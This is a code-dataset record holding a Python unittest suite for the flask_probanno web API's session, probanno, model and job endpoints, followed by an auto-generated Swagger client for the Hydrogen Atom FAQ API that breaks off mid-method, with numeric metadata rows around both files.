| 0.023627
| 0.416788
| 36,359
| 987
| 94
| 36.837893
| 0.725018
| 0.009626
| 0
| 0.860116
| 0
| 0
| 0.046773
| 0
| 0.001156
| 0
| 0
| 0
| 0
| 1
| 0.025434
| false
| 0
| 0
| 0
| 0.123699
| 0.001156
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c34a5ef2ecb12157c6357b1cc9ffba018bbf96f0
| 26,794
|
py
|
Python
|
test/api_tests.py
|
kingb12/flask_probanno
|
c0c57d3bac987eebc037ac21903c85ac628705a1
|
[
"MIT"
] | null | null | null |
test/api_tests.py
|
kingb12/flask_probanno
|
c0c57d3bac987eebc037ac21903c85ac628705a1
|
[
"MIT"
] | null | null | null |
test/api_tests.py
|
kingb12/flask_probanno
|
c0c57d3bac987eebc037ac21903c85ac628705a1
|
[
"MIT"
] | null | null | null |
import requests
import unittest
import json
import uuid
from flask_probanno import GET, POST, PUT
from controllers.probanno_management import CALCULATE_PROBANNO_JOB
from controllers.job import COMPLETE
# Base URL of the deployed probanno web API exercised by these tests.
BASE_URL = "http://probannoweb.systemsbiology.net/api"
# Default request headers; caching is disabled so every call hits the server.
HEADERS = {'cache-control': 'no-cache'}
# Genome/FASTA id used as an un-cached input in the calculate tests.
FASTA_1 = '267377'
# Genome/FASTA id whose likelihoods the server is expected to have cached.
CACHED_FASTA = '243232'
# Display name the server reports for CACHED_FASTA.
CACHED_FASTA_NAME = 'Methanocaldococcus jannaschii (strain ATCC 43067 / DSM 2661 / JAL-1 / JCM 10045 / NBRC 100440)'
# Identifier that should never resolve to a FASTA (drives the 404 checks).
NOT_A_FASTA = 'abcdef'
# fasta_id supplied when uploading a FASTA file in the PUT tests.
MY_FASTA_NAME = 'my_sequence'
# Local JSON model file uploaded by the model tests.
TEST_MODEL_FILE = 'maripaludis_model.json'
# Job name for gapfill requests.  NOTE(review): unused in the visible tests.
GAPFILL_MODEL_JOB = "gapfill_model"
class TestSessionMethods(unittest.TestCase):
    """Tests for the /session endpoint."""

    def test_get_session(self):
        """GET /session returns a token that parses as a UUID."""
        # BUG FIX: 'session' used to be assigned inside the try block, so a
        # failed request left it unbound and the finally clause raised
        # NameError instead of the real error.
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            # uuid.UUID raises ValueError for a malformed token, failing the test
            uuid.UUID(session)
        finally:
            clear_session_values(session, clear_session=True)
class TestProbannoMethods(unittest.TestCase):
    """Integration tests for the /probanno endpoints.

    Each test opens its own session against the live service at BASE_URL
    and tears it down in a finally block via clear_session_values.
    """

    def test_calculate_likelihoods_get(self):
        """GET /probanno/calculate schedules (or returns a cached) job."""
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            # un-cached: a new calculation job is created for this session
            job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": FASTA_1})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == FASTA_1
            # cached: the job is reported complete immediately
            job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session), params={"fasta_id": CACHED_FASTA})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == CACHED_FASTA
            assert job['status'] == COMPLETE
            # 404 FASTA not found
            response = make_api_request("/probanno/calculate", GET, authorize_headers(session),
                                        params={"fasta_id": NOT_A_FASTA})
            assert response.status_code == 404
            # 400 No session
            response = make_api_request("/probanno/calculate", GET, HEADERS,
                                        params={"fasta_id": FASTA_1})
            # BUG FIX: this response was fetched but its status never checked
            assert response.status_code == 400
            # 400 bad session
            response = make_api_request("/probanno/calculate", GET, authorize_headers(str(uuid.uuid4())),
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
        finally:
            # clean up
            clear_session_values(session, clear_session=True)

    def test_calculate_likelihoods_put(self):
        """PUT /probanno/calculate with an uploaded FASTA file."""
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            data = {'fasta_id': MY_FASTA_NAME}
            # BUG FIX: the uploaded file handle was opened inline and never
            # closed; the with-block guarantees it is released.
            with open('267377.fasta', 'rb') as fasta_file:
                files = {'fasta': fasta_file}
                # un-cached
                job = make_and_unpack_request("/probanno/calculate", PUT, authorize_headers(session), files=files, data=data)
                assert job['sid'] == session
                assert job['job'] == CALCULATE_PROBANNO_JOB
                assert job['target'] == MY_FASTA_NAME
                # 400 no FASTA
                response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
                                            data=data)
                # BUG FIX: this response was fetched but never checked
                assert response.status_code == 400
                # 400 no FASTA_ID
                response = make_api_request("/probanno/calculate", PUT, authorize_headers(session),
                                            files=files)
                assert response.status_code == 400
            # 400 No session
            response = make_api_request("/probanno/calculate", PUT, HEADERS,
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
            # 400 bad session
            response = make_api_request("/probanno/calculate", PUT, authorize_headers(str(uuid.uuid4())),
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
        finally:
            # clean up
            clear_session_values(session, clear_session=True)

    def test_get_likelihoods(self):
        """GET /probanno returns computed likelihoods for a session."""
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            # search for, expect missing
            response = make_api_request("/probanno", GET, authorize_headers(session),
                                        params={"fasta_id": CACHED_FASTA})
            assert response.status_code == 404
            # cached: populate it for our session
            job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
                                          params={"fasta_id": CACHED_FASTA})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == CACHED_FASTA
            assert job['status'] == COMPLETE
            # Now actually check retrieval
            result = make_and_unpack_request("/probanno", GET, authorize_headers(session),
                                             params={"fasta_id": CACHED_FASTA})
            assert type(result) == list
            # 400 No session
            response = make_api_request("/probanno", GET, HEADERS,
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
            # 400 bad session
            response = make_api_request("/probanno", GET, authorize_headers(str(uuid.uuid4())),
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
            # 400 missing fasta_id parameter
            response = make_api_request("/probanno", GET, HEADERS,
                                        params=None)
            assert response.status_code == 400
            # 404 unknown fasta_id
            response = make_api_request("/probanno", GET, authorize_headers(session),
                                        params={"fasta_id": NOT_A_FASTA})
            assert response.status_code == 404
        finally:
            # clean up
            clear_session_values(session, clear_session=True)

    def test_list_likelihoods(self):
        """GET /probanno/list enumerates the session's likelihood sets."""
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            # search for, expect empty list
            result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
                                             params={"fasta_id": CACHED_FASTA})
            assert len(result) == 0 and type(result) == list
            # cached: populate it for our session
            job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
                                          params={"fasta_id": CACHED_FASTA})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == CACHED_FASTA
            assert job['status'] == COMPLETE
            # Now actually check retrieval
            result = make_and_unpack_request("/probanno/list", GET, authorize_headers(session),
                                             params={"fasta_id": CACHED_FASTA})
            assert type(result) == list
            assert len(result) == 1
            assert type(result[0]) == dict
            assert result[0]['name'] == CACHED_FASTA_NAME
            assert result[0]['fasta_id'] == CACHED_FASTA
            # 400 No session
            response = make_api_request("/probanno/list", GET, HEADERS,
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
            # 400 bad session
            response = make_api_request("/probanno/list", GET, authorize_headers(str(uuid.uuid4())),
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
        finally:
            # clean up
            clear_session_values(session, clear_session=True)

    def test_download_likelihoods(self):
        """GET /probanno/download streams the likelihoods as JSON."""
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            # search for, expect missing
            response = make_api_request("/probanno/download", GET, authorize_headers(session),
                                        params={"fasta_id": CACHED_FASTA})
            assert response.status_code == 404
            # cached: populate it for our session
            job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
                                          params={"fasta_id": CACHED_FASTA})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == CACHED_FASTA
            assert job['status'] == COMPLETE
            # Now actually check retrieval
            result = make_api_request("/probanno/download", GET, authorize_headers(session),
                                      params={"fasta_id": CACHED_FASTA})
            # NOTE(review): requests' .content is bytes on Python 3; this str
            # check suggests the suite targets Python 2 — confirm.
            assert type(result.content) == str
            # BUG FIX: the closing parenthesis was misplaced —
            # `type(json.loads(x) == list)` checked type(False), which is
            # always truthy; the parsed payload's type is now asserted.
            assert type(json.loads(result.content)) == list
            # 400 No session
            # BUG FIX: these two checks hit "/probanno" instead of the
            # "/probanno/download" endpoint under test (copy-paste slip).
            response = make_api_request("/probanno/download", GET, HEADERS,
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
            # 400 bad session
            response = make_api_request("/probanno/download", GET, authorize_headers(str(uuid.uuid4())),
                                        params={"fasta_id": FASTA_1})
            assert response.status_code == 400
        finally:
            # clean up
            clear_session_values(session, clear_session=True)
class TestModelMethods(unittest.TestCase):
def test_get_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert(response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_download_model(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
try:
# search for, expect missing
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
job = None
with open(TEST_MODEL_FILE, 'rb') as f:
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result.content) == str)
assert(type(json.loads(result.content) == dict))
# 400 No session
response = make_api_request("/model/download", GET, HEADERS,
params={"model_id": model_id})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model/download", GET, authorize_headers(str(uuid.uuid4())),
params={"model_id": model_id})
assert response.status_code == 400
response = make_api_request("/model/download", GET, HEADERS,
params=None)
assert response.status_code == 400
response = make_api_request("/model/download", GET, authorize_headers(session),
params={"model_id": NOT_A_FASTA})
assert response.status_code == 404
finally:
# clean up
clear_session_values(session, clear_session=True)
def test_model_put(self):
model_id = "my_model"
session = make_and_unpack_request("/session", GET, HEADERS)
f = open(TEST_MODEL_FILE, 'rb')
try:
# search for, expect missing
response = make_api_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (response.status_code == 404)
# cached: populate it for our session
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Update Case
f = open(TEST_MODEL_FILE, 'rb')
response = make_api_request("/model", PUT, authorize_headers(session),
data={"model_id": model_id}, files={"file": f})
assert (response.status_code == 200)
# Now actually check retrieval
result = make_and_unpack_request("/model", GET, authorize_headers(session),
params={"model_id": model_id})
assert (type(result) == dict)
# 400 No session
response = make_api_request("/model", PUT, HEADERS,
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
# 400 bad session
response = make_api_request("/model", PUT, authorize_headers(str(uuid.uuid4())),
data={"model_id": model_id}, files={"file": f})
assert response.status_code == 400
response = make_api_request("/model", PUT, HEADERS,
params=None)
assert response.status_code == 400
finally:
# clean up
clear_session_values(session, clear_session=True)
f.close()
def test_model_post(self):
    """POST /model: create, retrieve, plus session error cases.

    Fixes the original's file handling (the single handle was left open in
    some paths and reused after being read to EOF, so later uploads sent an
    empty payload) and removes the unused `job = None` local.
    """
    model_id = "my_model"
    session = make_and_unpack_request("/session", GET, HEADERS)
    try:
        # search for, expect missing
        response = make_api_request("/model", GET, authorize_headers(session),
                                    params={"model_id": model_id})
        assert response.status_code == 404
        # cached: populate it for our session
        with open(TEST_MODEL_FILE, 'rb') as f:
            response = make_api_request("/model", POST, authorize_headers(session),
                                        data={"model_id": model_id}, files={"file": f})
        assert response.status_code == 200
        # Now actually check retrieval
        result = make_and_unpack_request("/model", GET, authorize_headers(session),
                                         params={"model_id": model_id})
        assert type(result) == dict
        # 400 No session
        with open(TEST_MODEL_FILE, 'rb') as f:
            response = make_api_request("/model", POST, HEADERS,
                                        data={"model_id": model_id}, files={"file": f})
        assert response.status_code == 400
        # 400 bad session
        with open(TEST_MODEL_FILE, 'rb') as f:
            response = make_api_request("/model", POST, authorize_headers(str(uuid.uuid4())),
                                        data={"model_id": model_id}, files={"file": f})
        assert response.status_code == 400
        response = make_api_request("/model", POST, HEADERS,
                                    params=None)
        assert response.status_code == 400
    finally:
        # clean up
        clear_session_values(session, clear_session=True)
def test_model_list(self):
    """GET /model/list: empty for a fresh session, one entry after an
    upload, and 400 for missing or unknown sessions."""
    model_id = "my_model"
    session = make_and_unpack_request("/session", GET, HEADERS)
    auth = authorize_headers(session)
    try:
        # a fresh session starts with no models
        listing = make_and_unpack_request("/model/list", GET, auth)
        assert type(listing) == list and len(listing) == 0
        # upload one model for this session
        with open(TEST_MODEL_FILE, 'rb') as handle:
            upload = make_api_request("/model", PUT, auth,
                                      data={"model_id": model_id},
                                      files={"file": handle})
            assert upload.status_code == 200
        # the listing now contains exactly the uploaded model
        listing = make_and_unpack_request("/model/list", GET, auth)
        assert type(listing) == list and len(listing) == 1
        # 400 when no session header is supplied
        assert make_api_request("/model/list", GET, HEADERS).status_code == 400
        # 400 when the session id is unknown
        bad_auth = authorize_headers(str(uuid.uuid4()))
        assert make_api_request("/model/list", GET, bad_auth).status_code == 400
    finally:
        # clean up
        clear_session_values(session, clear_session=True)
def test_model_gapfill(self):
    """GET /model/gapfill: happy path plus session, not-found, and
    missing-argument error cases."""
    model_id = "my_model"
    session = make_and_unpack_request("/session", GET, HEADERS)
    auth = authorize_headers(session)
    try:
        # upload a model to gap-fill
        with open(TEST_MODEL_FILE, 'rb') as handle:
            upload = make_api_request("/model", PUT, auth,
                                      data={"model_id": model_id},
                                      files={"file": handle})
            assert upload.status_code == 200
        # probanno for the cached fasta is already complete
        job = make_and_unpack_request("/probanno/calculate", GET, auth,
                                      params={"fasta_id": CACHED_FASTA})
        assert job['sid'] == session
        assert job['job'] == CALCULATE_PROBANNO_JOB
        assert job['target'] == CACHED_FASTA
        assert job['status'] == COMPLETE
        # kick off the gap-fill itself and check the returned job record
        job = make_and_unpack_request("/model/gapfill", GET, auth,
                                      params={"model_id": model_id,
                                              "fasta_id": CACHED_FASTA,
                                              "output_id": "my_new_model",
                                              "template": "GramNegative"})
        assert job['sid'] == session
        assert job['job'] == GAPFILL_MODEL_JOB
        assert job['target'] == model_id
        # 400 when no session header is supplied
        no_session = make_api_request("/model/gapfill", GET, HEADERS,
                                      params={"model_id": model_id})
        assert no_session.status_code == 400
        # 400 when the session id is unknown
        bad_session = make_api_request("/model/gapfill", GET,
                                       authorize_headers(str(uuid.uuid4())),
                                       params={"model_id": model_id})
        assert bad_session.status_code == 400
        # 400 with no parameters at all
        assert make_api_request("/model/gapfill", GET, HEADERS,
                                params=None).status_code == 400
        # 404 for an unknown fasta id
        assert make_api_request("/model/gapfill", GET, auth,
                                params={"model_id": model_id,
                                        "fasta_id": NOT_A_FASTA,
                                        "output_id": "my_new_model",
                                        "template": "GramNegative"}).status_code == 404
        # 404 for an unknown model id
        assert make_api_request("/model/gapfill", GET, auth,
                                params={"model_id": NOT_A_FASTA,
                                        "fasta_id": CACHED_FASTA,
                                        "output_id": "my_new_model",
                                        "template": "GramNegative"}).status_code == 404
        # 400 when required arguments are missing (fasta_id / output_id / model_id)
        assert make_api_request("/model/gapfill", GET, auth,
                                params={"model_id": NOT_A_FASTA,
                                        "fasta_id": CACHED_FASTA,
                                        "template": "GramNegative"}).status_code == 400
        assert make_api_request("/model/gapfill", GET, auth,
                                params={"model_id": NOT_A_FASTA,
                                        "output_id": "my_new_model",
                                        "template": "GramNegative"}).status_code == 400
        assert make_api_request("/model/gapfill", GET, auth,
                                params={"fasta_id": CACHED_FASTA,
                                        "output_id": "my_new_model",
                                        "template": "GramNegative"}).status_code == 400
    finally:
        # clean up
        clear_session_values(session, clear_session=True)
class TestJobMethods(unittest.TestCase):
    """Tests for the /job endpoints."""

    def test_get_job(self):
        """GET /job: lookup by id, 404 for unknown ids, 400 for missing or
        bad sessions.

        Fix: the "400 No session" response was previously never asserted.
        """
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            # 404 when the id does not name a job
            response = make_api_request("/job", GET, authorize_headers(session),
                                        params={"job_id": FASTA_1})
            assert response.status_code == 404
            # start a job so there is something to look up
            job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
                                          params={"fasta_id": FASTA_1})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == FASTA_1
            job = make_and_unpack_request("/job", GET, authorize_headers(session),
                                          params={"job_id": job['jid']})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == FASTA_1
            # 404 JOB not found
            response = make_api_request("/job", GET, authorize_headers(session),
                                        params={"job_id": NOT_A_FASTA})
            assert response.status_code == 404
            # 400 No session
            response = make_api_request("/job", GET, HEADERS,
                                        params={"job_id": job['jid']})
            assert response.status_code == 400
            # 400 bad session
            response = make_api_request("/job", GET, authorize_headers(str(uuid.uuid4())),
                                        params={"job_id": job['jid']})
            assert response.status_code == 400
        finally:
            # clean up
            clear_session_values(session, clear_session=True)

    def test_list_job(self):
        """GET /job/list: empty, then one job after starting one, plus
        session error cases.

        Fix: the "400 No session" response was previously never asserted.
        """
        session = make_and_unpack_request("/session", GET, HEADERS)
        try:
            result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
            assert type(result) == list and len(result) == 0
            job = make_and_unpack_request("/probanno/calculate", GET, authorize_headers(session),
                                          params={"fasta_id": FASTA_1})
            assert job['sid'] == session
            assert job['job'] == CALCULATE_PROBANNO_JOB
            assert job['target'] == FASTA_1
            result = make_and_unpack_request("/job/list", GET, authorize_headers(session))
            assert type(result) == list and len(result) == 1
            # 400 No session
            response = make_api_request("/job/list", GET, HEADERS)
            assert response.status_code == 400
            # 400 bad session
            response = make_api_request("/job/list", GET, authorize_headers(str(uuid.uuid4())))
            assert response.status_code == 400
        finally:
            # clean up
            clear_session_values(session, clear_session=True)
def make_api_request(path, method, headers, params=None, files=None, data=None):
    """
    helper method for making a request against the API and returning the raw response
    :param path: sub path of the API
    :param method: HTTP method
    :param headers: Associated headers
    :param params: optional query-string parameters
    :param files: optional multipart file payload
    :param data: optional form-encoded body
    :return: HTTP result
    """
    response = requests.request(method, BASE_URL + path, headers=headers, params=params, files=files, data=data)
    return response
def make_and_unpack_request(path, method, headers, params=None, files=None, data=None):
    """
    helper method for making a request and unpacking the JSON result
    :param path: sub path of the API
    :param method: HTTP method
    :param headers: Associated headers
    :param params: optional query-string parameters
    :param files: optional multipart file payload
    :param data: optional form-encoded body
    :return: deserialized JSON body of the response
    """
    response = make_api_request(path, method, headers, params=params, files=files, data=data)
    # NOTE(review): assumes the server always answers with valid JSON; a
    # non-JSON error body would raise ValueError here.
    return json.loads(response.text)
def authorize_headers(session):
    """Return the default request headers augmented with a session token.

    On a key collision the defaults in HEADERS win, matching the original
    dict.update semantics.
    """
    return {"session": session, **HEADERS}
def clear_session_values(session, clear_session=False):
    """Ask the API to clear server-side values for the given session;
    when clear_session is True the session itself is discarded too."""
    make_api_request('/session/clear', GET, authorize_headers(session), params={'clear_session': clear_session})
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| 49.618519
| 132
| 0.542547
| 2,711
| 26,794
| 5.108816
| 0.058281
| 0.033357
| 0.063682
| 0.093718
| 0.905199
| 0.893213
| 0.882671
| 0.872058
| 0.843249
| 0.814874
| 0
| 0.019265
| 0.356834
| 26,794
| 539
| 133
| 49.710575
| 0.784425
| 0.069605
| 0
| 0.753117
| 0
| 0
| 0.095713
| 0.000888
| 0
| 0
| 0
| 0
| 0.274314
| 1
| 0.044888
| false
| 0
| 0.017456
| 0
| 0.079801
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c34e10de9d4e92cd05387d30abe41d9f580ace24
| 19,911
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/faq_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/faq_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/faq_api.py
|
sumit4-ttn/SDK
|
b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Hydrogen Atom API
The Hydrogen Atom API # noqa: E501
OpenAPI spec version: 1.7.0
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class FAQApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Fall back to a default-configured client so the API class is
        # usable without explicit setup.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def create_faq_using_post(self, faq_request, **kwargs):  # noqa: E501
        """Create a FAQ  # noqa: E501

        Create a new FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_faq_using_post(faq_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Faq faq_request: faqRequest (required)
        :return: Faq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        # async_req=True returns the request thread; otherwise unwrap the data.
        if kwargs.get('async_req'):
            return self.create_faq_using_post_with_http_info(faq_request, **kwargs)  # noqa: E501
        else:
            (data) = self.create_faq_using_post_with_http_info(faq_request, **kwargs)  # noqa: E501
            return data

    def create_faq_using_post_with_http_info(self, faq_request, **kwargs):  # noqa: E501
        """Create a FAQ  # noqa: E501

        Create a new FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_faq_using_post_with_http_info(faq_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param Faq faq_request: faqRequest (required)
        :return: Faq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['faq_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated pattern: capture locals(), reject unknown keyword
        # arguments, then flatten the accepted kwargs into `params`.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_faq_using_post" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'faq_request' is set
        if ('faq_request' not in params or
                params['faq_request'] is None):
            raise ValueError("Missing the required parameter `faq_request` when calling `create_faq_using_post`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The FAQ payload travels as the JSON request body.
        body_params = None
        if 'faq_request' in params:
            body_params = params['faq_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/faq', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Faq',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_faq_using_delete(self, faq_id, **kwargs):  # noqa: E501
        """Delete a FAQ  # noqa: E501

        Permanently delete a FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_faq_using_delete(faq_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str faq_id: UUID faq_id (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        # async_req=True returns the request thread; otherwise unwrap the data.
        if kwargs.get('async_req'):
            return self.delete_faq_using_delete_with_http_info(faq_id, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_faq_using_delete_with_http_info(faq_id, **kwargs)  # noqa: E501
            return data

    def delete_faq_using_delete_with_http_info(self, faq_id, **kwargs):  # noqa: E501
        """Delete a FAQ  # noqa: E501

        Permanently delete a FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_faq_using_delete_with_http_info(faq_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str faq_id: UUID faq_id (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['faq_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated pattern: validate and flatten kwargs via locals().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_faq_using_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'faq_id' is set
        if ('faq_id' not in params or
                params['faq_id'] is None):
            raise ValueError("Missing the required parameter `faq_id` when calling `delete_faq_using_delete`")  # noqa: E501

        collection_formats = {}

        # faq_id is substituted into the URL path, not the query string.
        path_params = {}
        if 'faq_id' in params:
            path_params['faq_id'] = params['faq_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['*/*'])  # noqa: E501

        # Authentication setting
        auth_settings = ['oauth2']  # noqa: E501

        return self.api_client.call_api(
            '/faq/{faq_id}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def get_faq_all_using_get(self, **kwargs):  # noqa: E501
        """List all FAQ  # noqa: E501

        Get the information for all FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_faq_all_using_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param bool ascending: ascending
        :param str filter: filter
        :param str order_by: order_by
        :param int page: page
        :param int size: size
        :return: PageFaq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        # async_req=True returns the request thread; otherwise unwrap the data.
        if kwargs.get('async_req'):
            return self.get_faq_all_using_get_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.get_faq_all_using_get_with_http_info(**kwargs)  # noqa: E501
            return data

    def get_faq_all_using_get_with_http_info(self, **kwargs):  # noqa: E501
        """List all FAQ  # noqa: E501

        Get the information for all FAQ  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_faq_all_using_get_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param bool ascending: ascending
        :param str filter: filter
        :param str order_by: order_by
        :param int page: page
        :param int size: size
        :return: PageFaq
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['ascending', 'filter', 'order_by', 'page', 'size']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated pattern: validate and flatten kwargs via locals().
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
